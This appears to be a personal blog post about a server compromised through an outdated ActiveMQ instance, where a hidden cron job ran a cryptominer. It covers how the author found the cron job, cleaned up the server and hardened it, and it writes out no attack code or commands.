How a Hidden Cron Job Hijacked My Server and How I Fixed It

Incident Overview

My online server, which hosts Tomcat, MySQL, MongoDB and ActiveMQ, suddenly became inaccessible.

Investigation

After logging in with a fast 150‑plus keystroke speed, I saw that Tomcat had crashed and any restart attempts were killed. Running top revealed a mysterious process repeatedly consuming CPU.

Suspecting a scheduled task, I examined the crontab and discovered a hidden entry that kept respawning the process.

The task downloaded and executed a cryptomining script, as shown in the captured script image.

For those interested, the full source can be retrieved with a single command (the exact command is shown in the original blog image).

Remediation Steps

1. Kill the malicious process and remove the crontab entry. 2. Locate the temporary directory (in my case /var/tmp) and delete the malicious files. 3. Restart Tomcat and other services.

These actions restored service availability, but they only addressed the symptom.

Hardening Measures

To prevent recurrence, I performed the following:

Upgrade all software to the latest versions.

Change default ports for all services.

Inspect ~/.ssh/authorized_keys and remove unknown keys.

Delete unfamiliar user accounts.

Block the attacker’s IP address.

Configure SSH to use key‑based authentication only and disable password login.

The root cause was a vulnerability in an old version of ActiveMQ exposing port 61616, which allowed the attacker to deploy the mining script.

Final Thoughts

One community‑suggested “ultimate” fix is to replace the attacker’s script with your own mining script, ensuring any future attempts fail, but a proper security patch and system hardening are the recommended solutions.